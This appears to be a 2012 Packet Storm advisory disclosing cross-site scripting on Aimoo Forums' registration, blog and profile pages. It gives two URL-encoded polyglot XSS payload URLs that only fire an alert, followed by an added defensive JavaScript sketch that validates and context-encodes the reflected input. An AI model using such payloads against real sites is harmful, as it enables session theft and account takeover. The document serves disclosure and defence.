Aimoo Forums Cross Site Scripting

2012-01-25T00:00:00
ID PACKETSTORM:109071
Type packetstorm
Reporter Sony
Modified 2012-01-25T00:00:00

Description

                                        
`# Exploit Title: Aimoo Forums Cross Site Scripting  
# Date: 25.01.2012  
# Author: Sony  
# Software Link: http://www.aimoo.com/  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/01/aimoo-forums-cross-site-scripting.html  
..................................................................  
  
We have XSS in the registration page:  
  
http://www.aimoo.com/CommunityName-%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E/Create.html  
  
Also in the blog page:  
  
http://zone.aimoo.com/blog/administrator/List/0/1%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
And in the profile page we have HTML code injection:  
  
http://profile.aimoo.com/neskaju  
http://zone.aimoo.com/photo/neskaju  
  
etc. (I think)  
  
Demo Video:  
  
http://www.youtube.com/watch?v=8EdHWq7LLpY  
`
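
The PoC paths above carry one payload that tries several breakouts at once: single- and double-quoted strings, an HTML comment, a script block and an attribute value. The following is an added example, not part of the advisory and not Aimoo's code: a handler sketch that allowlists the reflected path segment and then encodes it for each output context. The function names, the community-name format and the page template are assumptions.

```javascript
// Added example. Function names, the name format and the template are assumptions.

// Shortened excerpt of the advisory's registration-page PoC path (sample input).
const SAMPLE_PATH =
  "/CommunityName-%27;alert%28String.fromCharCode%2888,83,83%29%29//" +
  "--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode" +
  "%2888,83,83%29%29%3C/SCRIPT%3E/Create.html";

// Return the decoded segment between the leading "/" and "/Create.html",
// or null if the path has another shape or contains malformed %-escapes.
function communityName(path) {
  let decoded;
  try {
    decoded = decodeURIComponent(path);
  } catch (e) {
    return null;
  }
  const m = /^\/([\s\S]*)\/Create\.html$/.exec(decoded);
  return m ? m[1] : null;
}

// Allowlist (assumed format): letters, digits, "_" and "-", at most 64 chars.
function isValidCommunityName(name) {
  return /^[A-Za-z0-9_-]{1,64}$/.test(name);
}

// Encoder for HTML element content and quoted attribute values.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Encoder for a quoted string literal in an inline script block: every
// non-alphanumeric UTF-16 unit becomes \uXXXX, so quotes, "/" and "<" vanish.
function encodeJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Validate first, then encode per context as defence in depth.
function renderCreatePage(path) {
  const name = communityName(path);
  if (name === null || !isValidCommunityName(name)) {
    return { status: 400, body: "Invalid community name" };
  }
  const body = `<h1>Create ${encodeHtml(name)}</h1>` +
    `<script>var community = "${encodeJsString(name)}";</script>`;
  return { status: 200, body };
}
```

The HTML encoder alone is not enough for the inline-script context, which is why the two encoders are kept separate.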